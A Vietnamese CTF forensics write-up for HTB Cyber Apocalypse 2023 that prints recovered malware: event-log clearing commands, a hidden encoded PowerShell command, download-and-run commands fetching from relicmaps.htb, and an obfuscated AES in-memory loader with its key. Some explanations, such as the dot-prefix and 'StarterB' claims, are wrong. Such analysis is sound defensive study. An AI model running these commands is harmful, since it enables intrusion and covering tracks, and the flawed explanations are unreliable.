HTB Cyber Apocalypse 2023

# Write-up HTB Cyber Apocalypse 2023 ## README Giải này mình chơi khá muộn do phải chạy task của idol bquanman =))) .Nên chỉ giải được chừng này chall (mà có thêm tg thì chắc mình cx ko giải ra thêm đc chall nào nx :) ) ## Forensics | Category | Challenge Name | Difficulty | | -------- | -------------- | ---------- | | Forensics| Plaintext Tleasure| Very Easy | | Forensics| Alien Cradle | Very Easy | | Forensics| Extraterrestrial Persistence| Very Easy | | Forensics| Roten | Easy | | Forensics| Artifacts of Dangerous Sightings|Medium | | Forensics| Relic Maps | Medium | | Forensics| Bashic Ransomware | Hard | ### Plaintext Tleasure ![](https://i.imgur.com/meDSxmf.png) #### Giải Pháp => Follow TCP Stream eq 4 => lụm flag ![](https://i.imgur.com/IJrxiFI.png) `Flag: HTB{th3s3_4l13ns_st1ll_us3_HTTP}` ### Alien Cradle ![](https://i.imgur.com/NnwmTlm.png) #### Giải Pháp Mở file .ps1 lên, ta dễ dàng thấy flag ![](https://i.imgur.com/nQgybrc.png) ``Flag: HTB{p0w3rsh3ll_Cr4dl3s_c4n_g3t_th3_j0b_d0n3}`` ### Extraterrestrial Persistence ![](https://i.imgur.com/6dFV7fU.png) #### Giải Pháp Mở .sh file lên => decode đoạn mã base64 là thấy flag ![](https://i.imgur.com/wWHxlTY.png) ![](https://i.imgur.com/BncHPa0.png) ``Flag: HTB{th3s3_4l13nS_4r3_s00000_b4s1c}`` ### Roten ![](https://i.imgur.com/LT6jc69.png) #### Giải Pháp Đề cho chúng ta 1 file pcap => phân tích nó bằng wireshark thì phát hiện đa số lưu lượng trong file là tcp và http ![](https://i.imgur.com/tsw3kQE.png) Ban đầu mình follow tcp stream để xem thì phát hiện nhiều file ảnh và pdf nhưng đáng tiếc là chúng không cs gì đặc biệt cả :vv Sau đó mình export http để xem http object list thì thấy có khá nhiều file .php mà theo mô tả của đề bài thì nó liên quan đến webshell => đây là 1 chall có liên quan đến php shell Mình có hỏi hint `kakuja` thì biết được 1 công cụ để phân tích nó là [NetworkMiner](https://www.netresec.com/?page=NetworkMiner) , đây là công cụ điều tra mạng nguồn mở trích xuất các thành phần tạo tác, chẳng hạn như tệp, hình ảnh, email và mật khẩu, từ lưu lượng truy cập mạng bị bắt trong các tệp PCAP. Dựa vào những gì đã phân tích thì mình dựa vào keyword ở đây là `php` để tìm file php gốc Sắp xếp Extension 1 chút thì mình đã thấy nó nằm ở dưới cùng ![](https://i.imgur.com/bRC78xu.png) Ok bây giờ mình sẽ extract nó ra và mở lên xem ![](https://i.imgur.com/UPY9TKl.png) => Nhận thấy webshell php này đã bị xáo trộn, tới khúc này thì mình hơi bí do chưa hc về nó =))) thì `longkd` đã mở mang tầm mắt của mình. Các phần bị xáo trộn của tập php này đã được nối với nhau và được đánh giá ở cuối tập lệnh. Cụ thể là dòng `eval( $bhrTeZXazQ );` Đổi eval => echo và bỏ đi 2 dấu ngoặc,sau đó lưu file là flag.php Cuối cùng dùng [XAMPP](https://www.apachefriends.org/index.html) để chạy file php , một phần mềm cho phép giả lập môi trường server hosting ngay trên máy tính của bạn, cho phép bạn chạy demo website mà không cần phải mua hosting hay VPS. ![](https://i.imgur.com/a1bRjFr.png) ![](https://i.imgur.com/HVHZtaU.png) Mở lên xem source của nó và lụm flag :vv ![](https://i.imgur.com/jPMLJhq.png) ``Flag: HTB{W0w_ROt_A_DaY}`` ### Artifacts of Dangerous Sightings ![](https://i.imgur.com/mNJYoCg.png) #### Giải Pháp Đề cho chúng ta 1 file .vhdx => dùng AccessData FTK Imager đề phân tích nó Sau 1 lúc phân tích thì mình phát hiện đểm đang nghi ngờ : ![](https://i.imgur.com/KAi7O79.png) ``` type finpayload > C:\Windows\Tasks\ActiveSyncProvider.dll:hidden.ps1 exit Get-WinEvent Get-EventLog -List wevtutil.exe cl "Windows PowerShell" wevtutil.exe cl Microsoft-Windows-PowerShell/Operational Remove-EventLog -LogName "Windows PowerShell" Remove-EventLog -LogName Microsoft-Windows-PowerShell/Operational Remove-EventLog ``` Dòng lệnh này có nghĩa là : ``` Đây là một loạt các lệnh PowerShell được liệt kê trên một dòng văn bản. Cụ thể: Lệnh đầu tiên là "type finpayload > C:\Windows\Tasks\ActiveSyncProvider.dll:hidden.ps1", nó sẽ đọc nội dung của tệp tin "finpayload" và ghi đè vào tệp tin "hidden.ps1" trong thư mục "C:\Windows\Tasks\ActiveSyncProvider.dll". Tệp tin "hidden.ps1" sẽ được ẩn đi vì có tiền tố là dấu chấm. Lệnh tiếp theo là "exit", nó sẽ đóng PowerShell. Tiếp theo là các lệnh để xem các sự kiện trên hệ thống. Lệnh "Get-WinEvent" sẽ lấy tất cả các sự kiện từ nhật ký sự kiện của hệ thống, trong khi "Get-EventLog -List" sẽ liệt kê tất cả các nhật ký sự kiện có sẵn trên hệ thống. Các lệnh "wevtutil.exe cl" được sử dụng để xóa các nhật ký sự kiện cụ thể. Lệnh "wevtutil.exe cl "Windows PowerShell"" sẽ xóa nhật ký sự kiện "Windows PowerShell", trong khi "wevtutil.exe cl Microsoft-Windows-PowerShell/Operational" sẽ xóa nhật ký "Microsoft-Windows-PowerShell/Operational". Các lệnh "Remove-EventLog" được sử dụng để xóa các nhật ký sự kiện đã được đăng ký trong hệ thống. Lệnh "Remove-EventLog -LogName "Windows PowerShell"" sẽ xóa nhật ký sự kiện "Windows PowerShell", trong khi "Remove-EventLog -LogName Microsoft-Windows-PowerShell/Operational" sẽ xóa nhật ký "Microsoft-Windows-PowerShell/Operational". Lệnh "Remove-EventLog" được sử dụng một cách không hợp lệ và không đưa ra tên nhật ký nào để xóa. ``` Oke bây h chúng ta sẽ tìm tệp hidden.ps1 để phân tích nó Và mình đã tìm thấy nó : ![](https://i.imgur.com/HYoPASz.png) Có dòng lệnh là : ``` powerShell.exe -WindowStyle hiddeN -ExecuTionPolicy ByPasS -enc JAB7AFsAfgBAAH0AIAA9ACAAJAAoACkAOwAgACQAewAhACEAQAAhACEAXQB9ACAAPQAgACsAKwAkAHsAWwB+AEAAfQA7ACAAJAB7AFsAWwAhAH0AIAA9ACAALQAtACQAewBbAH4AQAB9ACAAKwAgACQAewAhACEAQAAhACEAXQB9ACAAKwAgACQAewAhACEAQAAhACEAXQB9ADsAIAAkAHsAfgB+AH4AXQB9ACAAPQAgACQAewBbAFsAIQB9ACAAKwAgACQAewAhACEAQAAhACEAXQB9ADsAIAAkAHsAWwAhACEAWwAhAH0AIAA9ACAAJAB7AFsAWwAhAH0AIAArACAAJAB7AFsAWwAhAH0AOwAgACQAewAoAH4AKAAhAH0AIAA9ACAAJAB7AH4AfgB+AF0AfQAgACsAIAAkAHsAWwBbACEAfQA7ACAAJAB7ACEAfgAhACkAKQB9ACAAPQAgACQAewBbACEAIQBbACEAfQAgACsAIAAkAHsAWwBbACEAfQA7ACAAJAB7ACgAKAAhAH0AIAA9ACAAJAB7ACEAIQBAACEAIQBdAH0AIAArACAAJAB7AFsAIQAhAFsAIQB9ACAAKwAgACQAewBbAFsAIQB9ADsAIAAkAHsAPQAhACEAQAAhACEAfQAgAKAAPQAgACQAewB+AH4AfgBdAH0AIAAtACAAJAB7ACEAIQBAACEAIQBdAH0AIAArACAAJAB7ACEAfgAhACkAKQB9ADsAIAAkAHsAIQA9AH0AIAA9ACAAoAAkAHsAKAAoACEAfQAgAC0AIAAkAHsAfgB+AH4AXQB9ACAAKwAgACQAewAhAH4AIQApACkAfQAgAC0AIAAkAHsAIQAhAEAAIQAhAF0AfQA7ACAAJAB7AD0AQAAhAH4AIQB9ACAAPQAgACIAIgAuACgAIgAkACgAQAB7AH0AKQAiAFsAMQA0AF0AKwAiACQAKABAAHsAfQApACIAWwAxADYAXQArACIAJAAoAEAAewB9ACkAIgBbADIAMQBdACsAIgAkACgAQAB7AH0AKQAiAFsAMgA3AF0AKwAiACQAPwAiAFsAMQBdACsAIgAkACgAQAB7AH0AKQAiAFsAMwBdACkAOwAgACQAewA9AEAAIQB+ACEAfQAgAD0AIAAiACQAKABAAHsAfQApACIAWwAxADQAXQArACIAJAA/ACIAWwAzAF0AKwAiACQAewA9AEAAIQB+ACEAfQAiAFsAMgA3AF0AOwAgACQAewBAACEAPQB9ACAAPQAgACIAWwAiACsAIgAkACgAQAB7AH0AKQAiAFsANwBdACsAIgAkACgAQAB7AH0AKQAiAFsAMgAyAF0AKwAiACQAKABAAHsAfQApACIAWwAyADAAXQArACIAJAA/ACIAWwAxAF0AKwAiAF0AIgA7AA0ACgAiACQAewBAACEAPQB9ACQAewB+AH4AfgBdAH0AJAB7ACgAfgAoACEAfQAgACsAIAAkAHsAQAAhAD0AfQAkAHsAfgB+AH4AXQB9ACQAewAoAH4AKAAhAH0AIAArACAAJAB7AEAAIQA9AH0AJAB7AH4AfgB+AF0AfQAkAHsAKAB+ACgAIQB9ACAAKwAgACQAewBAACEAPQB9ACQAewB+AH4AfgBdAH0AJAB7AFsAWwAhAH0AIAArACAAJAB7AEAAIQA9AH0AJAB7AFsAIQAhAFsAIQB9ACQAewAhAH4AIQApACkAfQAgACsAIAAkAHsAQAAhAD0AfQAkAHsAfgB+AH4AXQB9ACQAewBbAFsAIQB9ACAAKwAgACQAewBAACEAPQB9ACQAewB+AH4AfgBdAH0AJAB7AFsAWwAhAH0AIAArACAAJAB7AEAAIQA9AH0AJAB7AH4AfgB+AF0AfQAkAHsAWwBbACEAfQAgACsAIAAkAHsAQAAhAD0AfQAkAHsAfgB+AH4AXQB9ACQAewBbAFsAIQB9ACAAKwAgACQAewBAACEAPQB9ACQAewB+AH4AfgBdAH0AJAB7AFsAWwAhAH0AIAArACAAJAB7AEAAIQA9AH0AJAB7AFsAIQAhAFsAIQB9ACQAewAhAH4AIQApACkAfQAgACsAIAAkAHsAQAAhAD0AfQAkAHsAfgB+AH4AXQB9ACQAewBbAFsAIQB9ACAAKwAgACQAewBAACEAPQB9ACQAewB+AH4AfgBdAH0AJAB7AFsAWwAhAH0AIAArACAAJAB7AEAAIQA9AH0AJAB7AH4AfgB+AF0AfQAkAHsAWwBbACEAfQAgACsAIAAkAHsAQAAhAD0AfQAkAHsAfgB+AH4AXQB9ACQAewBbAFsAIQB9ACAAKwAgACQAewBAACEAPQB9ACQAewB+AH4AfgBdAH0AJAB7AFsAWwAhAH0AIAArACAAJAB7AEAAIQA9AH0AJAB7AH4AfgB+AF0AfQAkAHsAWwBbACEAfQAgACsAIAAkAHsAQAAhAD0AfQAkAHsAfgB+AH4AXQB9ACQAewBbAFsAIQB9ACAAKwAgACQAewBAACEAPQB9ACQAewBbACEAIQBbACEAfQAkAHsAIQB+ACEAKQApAH0AIAArACAAJAB7AEAAIQA9AH0AJAB7AH4AfgB+AF0AfQAkAHsAWwBbACEAfQAgACsAIAAkAHsAQAAhAD0AfQAkAHsAfgB+AH4AXQB9ACQAewBbAFsAIQB9ACAAKwAgACQAewBAACEAPQB9ACQAewBbACEAIQBbACEAfQAkAHsAIQB+ACEAKQApAH0AIAArACAAJAB7AEAAIQA9AH0AJAB7AH4AfgB+AF0AfQAkAHsAWwBbACEAfQAgACsAIAAkAHsAQAAhAD0AfQAkAHsAfgB+AH4AXQB9ACQAewBbAFsAIQB9ACAAKwAgACQAewBAACEAPQB9ACQAewB+AH4AfgBdAH0AJAB7AFsAWwAhAH0AIAArACAAJAB7AEAAIQA9AH0AJAB7AFsAIQAhAFsAIQB9ACQAewAhAH4AIQApACkAfQAgACsAIAAkAHsAQAAhAD0AfQAkAHsAfgB+AH4AXQB9ACQAewBbAFsAIQB9ACAAKwAgACQAewBAACEAPQB9ACQAewBbACEAIQBbACEAfQAkAHsAIQB+ACEAKQApAH0AIAArACAAJAB7AEAAIQA9AH0AJAB7AH4AfgB+AF0AfQAkAHsAWwBbACEAfQAgACsAIAAkAHsAQAAhAD0AfQAkAHsAfgB+AH4AXQB9ACQAewBbAFsAIQB9ACAAKwAgACQAewBAACEAPQB9ACQAewB+AH4AfgBdAH0AJAB7AFsAWwAhAH0AIAArACAAJAB7AEAAIQA9AH0AJAB7AFsAIQAhAFsAIQB9ACQAewAhAH4AIQApACkAfQAgACsAIAAkAHsAQAAhAD0AfQAkAHsAfgB+AH4AXQB9ACQAewBbAFsAIQB9ACAAKwAgACQAewBAACEAPQB9ACQAewB+AH4AfgBdAH0AJAB7AFsAWwAhAH0AIAArACAAJAB7AEAAIQA9AH0AJAB7AH4AfgB+AF0AfQAkAHsAWwBbACEAfQAgACsAIAAkAHsAQAAhAD0AfQAkAHsAWwAhACEAWwAhAH0AJAB7ACEAfgAhACkAKQB9ACAsAWwAhAH0AIAArACAAJAB7AEAAIQA9AH0AJAB7AFsAIQAhAFsAIQB9ACQAewAhAH4AIQApACkAfQAgACsAIAAkAHsAQAAhAD0AfQAkAHsAfgB+AH4AXQB9ACQAewBbAFsAIQB9ACAAKwAgACQAewBAACEAPQB9ACQAewB+AH4AfgBdAH0AJAB7AFsAWwAhAH0AIAArACAAJAB7AEAAIQA9AH0AJAB7AFsAIQAhAFsAIQB9ACQAewAhAH4AIQApACkAfQAgACsAIAAkAHsAQAAhAD0AfQAkAHsAWwAhACEAWwAhAH0AJAB7ACEAfgAhACkAKQB9ACAAKwAgACQAewBAACEAPQB9ACQAewB+AH4AfgBdAH0AJAB7AFsAWwAhAH0AIAArACAAJAB7AEAAIQA9AH0AJAB7ACgAfgAoACEAfQAkAHsAPQAhACEAQAAhACEAfQAgACsAIAAkAHsAQAAhAD0AfQAkAHsAfgB+AH4AXQB9ACQAewBbAFsAIQB9ACAAKwAgACQAewBAACEAPQB9ACQAewB+AH4AfgBdAH0AJAB7AFsAWwAhAH0AIAArACAAJAB7AEAAIQA9AH0AJAB7AFsAIQAhAFsAIQB9ACQAewAoAH4AKAAhAH0AIAArACAAJAB7AEAAIQA9AH0AJAB7ACgAfgAoACEAfQAkAHsAPQAhACEAQAAhACEAfQAgACsAIAAkAHsAQAAhAD0AfQAkAHsAKAB+ACgAIQB9ACQAewA9ACEAIQBAACEAIQB9ACAAKwAgACQAewBAACEAPQB9ACQAewAoAH4AKAAhAH0AJAB7AD0AIQAhAEAAIQAhAH0AIAArACAAJAB7AEAAIQA9AH0AJAB7ACgAfgAoACEAfQAkAHsAPQAhACEAQAAhACEAfQAgACsAIAAk ``` ``` Nó là một lệnh PowerShell được sử dụng để chạy một tập lệnh PowerShell được mã hóa. Cụ thể, các tùy chọn được sử dụng trong câu lệnh là: "WindowStyle hidden" ẩn cửa sổ PowerShell khi chạy tập lệnh. "ExecutionPolicy ByPass" bỏ qua các cấu hình thực thi tập lệnh mặc định trong PowerShell, cho phép tập lệnh chạy mà không bị hạn chế bởi bất kỳ cấu hình nào. "-enc" chỉ định rằng tập lệnh được cung cấp sau đó sẽ được giải mã trước khi thực thi. ``` Dựa vào tất cả những gì mình tìm kiếm trc đó thì khá chắc rằng author đã mã hóa file hidden.ps1 bằng 1 công cụ nào đó trên powershell và mình tìm kiếm gg thì có 1 công cụ giải mã đó là [powerdecode](https://github.com/Malandrone/PowerDecode?),là một công cụ dựa trên PowerShell để giải mã các tập lệnh PowerShell được mã hóa trên nhiều lớp ở các dạng mã hóa khác nhau. Oke bây giờ chỉ cần cài đặt và giải mã nó thôi : ![](https://i.imgur.com/gSajPHH.png) ``Flag: HTB{Y0U_C4nt_St0p_Th3_Alli4nc3}`` ### Relic Maps ![](https://i.imgur.com/c3t7ZKd.png) #### Giải Pháp Bài này làm mất rất rất rất nhiều tg của mình do đây là dạng bài lần đầu mình gặp @@ Bài này cho mình IP và Port và link http://relicmaps.htb:/relicmaps.one nhưng mỗi sever sẽ có địa chỉ riêng nên mình thay nó bằng IP và Port như đề cho : `http://IPADDRESS:PORT/relicmaps.one` => Mình tải được file relicmaps.one về và đọc nó 1 chút thì phát hiện điểm đáng ngờ : ![](https://i.imgur.com/Nb9RsPJ.png) ``` ExecuteCmdAsync "cmd /c powershell Invoke-WebRequest -Uri http://relicmaps.htb/uploads/soft/topsecret-maps.one -OutFile $env:tmp\tsmap.one; Start-Process -Filepath $env:tmp\tsmap.one" ExecuteCmdAsync "cmd /c powershell Invoke-WebRequest -Uri http://relicmaps.htb/get/DdAbds/window.bat -OutFile $env:tmp\system32.bat; Start-Process -Filepath $env:tmp\system32.bat" ``` ``` Đây là 2 lệnh trong script hoặc mã độc thực thi trên hệ thống mục tiêu. Cụ thể, đoạn mã này sử dụng PowerShell để tải xuống 2 tệp tin từ địa chỉ URL đã chỉ định và sau đó thực thi chúng trên hệ thống mục tiêu bằng cách sử dụng cmd.exe. Lệnh đầu tiên sử dụng cmd.exe và PowerShell để tải xuống một tệp tin có tên là "topsecret-maps.one" từ URL http://relicmaps.htb/uploads/soft/topsecret-maps.one và lưu nó vào biến môi trường $env:tmp. Sau đó, lệnh Start-Process được sử dụng để thực thi tệp tin này bằng cách truyền đường dẫn đầy đủ đến tệp tin đó. Lệnh thứ hai sử dụng cmd.exe và PowerShell để tải xuống một tệp tin có tên là "window.bat" từ URL http://relicmaps.htb/get/DdAbds/window.bat và lưu nó vào thư mục $env:tmp\system32.bat. Sau đó, lệnh Start-Process được sử dụng để thực thi tệp tin này bằng cách truyền đường dẫn đầy đủ đến tệp tin đó. ``` Phân tích 1 chút về tệp relicmaps.one bằng [VirusTotal](https://www.virustotal.com/gui/home/upload) * Lưu ý : Nên thực hiện nó trên máy ảo vì file có chứa ransomeware Mình nhận thấy cũng không có gì đặc biệt lắm nên mình chuyển hướng sang phân tích file window.bat theo link đã phân tích ở trên. Sau khi tải file về mình ném nó lên virustotal để nó phân tích tiếp thì lần này mình đã phát hiện ra điểm đáng nghi ngờ ở `BEHAVIOR` : ![](https://i.imgur.com/5n8trWn.png) ``` C:\Users\user\Desktop\window.bat.exe "window.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $eIfqq = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\window.bat').Split([Environment]::NewLine);foreach ($YiLGW in $eIfqq) { if ($YiLGW.StartsWith(':: ')) { $VuGcO = $YiLGW.Substring(3); break; }; };$uZOcm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($VuGcO);$BacUA = New-Object System.Security.Cryptography.AesManaged;$BacUA.Mode = [System.Security.Cryptography.CipherMode]::CBC;$BacUA.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$BacUA.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0xdfc6tTBkD+M0zxU7egGVErAsa/NtkVIHXeHDUiW20=');$BacUA.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2hn/J717js1MwdbbqMn7Lw==');$Nlgap = $BacUA.CreateDecryptor();$uZOcm = $Nlgap.TransformFinalBlock($uZOcm, 0, $uZOcm.Length);$Nlgap.Dispose();$BacUA.Dispose();$mNKMr = New-Object System.IO.MemoryStream(, $uZOcm);$bTMLk = New-Object System.IO.MemoryStream;$NVPbn = New-Object System.IO.Compression.GZipStream($mNKMr, [IO.Compression.CompressionMode]::Decompress);$NVPbn.CopyTo($bTMLk);$NVPbn.Dispose();$mNKMr.Dispose();$bTMLk.Dispose();$uZOcm = $bTMLk.ToArray();$gDBNO = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($uZOcm);$PtfdQ = $gDBNO.EntryPoint;$PtfdQ.Invoke($null, (, [string[]] (''))) ``` Đọc hiểu chút về nó, đoạn mã này khá rối (đây là lý do mình mất khá nhiều tg cho nó@@) , đây là một lệnh trên powershell dùng AES mode CBC encrypt file window.bat, cụ thể là decrypt file bat có dòng nào bắt đầu bằng :: , tìm hiểu thêm về loại mã hóa [AES CBC](https://www.sciencedirect.com/topics/computer-science/cipher-block-chaining#:~:text=In%20cipher%20block%20chaining%20mode,encryption%20of%20the%20following%20block.), nó là một quá trình giải mã thông điệp đã được mã hóa bằng thuật toán AES CBC. Trong AES CBC, thông điệp được chia thành các khối cố định và mỗi khối được mã hóa độc lập bằng thuật toán AES trước khi được kết hợp với khối trước đó bằng phép XOR. Quá trình này tạo ra một chuỗi các khối được liên kết với nhau và đảm bảo tính toàn vẹn của thông điệp sau khi được mã hóa. Khi thực hiện giải mã AES CBC, trước hết các khối được giải mã bằng thuật toán AES và sau đó được kết hợp với khối trước đó bằng phép XOR để tái tạo lại thông điệp ban đầu.Để giải mã nó chúng ta cần có key và iv của nó. Đọc hiểu về nó xong thì mình tìm đc key và iv của nó là : `$BacUA.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0xdfc6tTBkD+M0zxU7egGVErAsa/NtkVIHXeHDUiW20=');` ``` Đây là một đoạn mã PowerShell để tạo ra một khóa mã hóa được sử dụng trong ứng dụng. Đoạn mã này bao gồm hai phần. Phần đầu tiên sử dụng một biểu thức chuỗi để tạo ra một chuỗi ký tự đảo ngược của chuỗi "BacUA.Key". Điều này sẽ tạo ra một chuỗi "fromBase64String64StarterB", sau đó chỉ lấy các ký tự từ vị trí -1 đến -16 của chuỗi này để tạo thành một chuỗi mới "StarterB". Phần thứ hai của đoạn mã sử dụng chuỗi "StarterB" như là một khóa để giải mã một chuỗi base64 string, tạo thành một mảng byte đại diện cho khóa. Kết quả là một khóa được sử dụng để mã hóa hoặc giải mã dữ liệu trong ứng dụng. ``` => key : 0xdfc6tTBkD+M0zxU7egGVErAsa/NtkVIHXeHDUiW20= ` $BacUA.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2hn/J717js1MwdbbqMn7Lw=='); ` ``` Đoạn mã PowerShell này tương tự như đoạn mã trước ($BacUA.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2hn/J717js1MwdbbqMn7Lw==');, nhưng sử dụng chuỗi base64 string khác để tạo ra một chuỗi khởi tạo vector (IV) cho việc mã hóa AES CBC. ``` => IV : 2hn/J717js1MwdbbqMn7Lw== Bây giờ chúng ta sẽ tìm cái để decrypt =)), lúc đầu mình cứ tưởng nó ở trong đoạn mã kia lun nhưng thực chất là không@@ Thì đoạn mã như mình đã phân tích đó là nó encrypt tệp window.bat bằng AES CBC nên vào file đó để tìm thôi và ta chủ yếu tập trung vào đoạn sau dấu :: Và nó đây rồi : ![](https://i.imgur.com/dY58LNF.png) ``` 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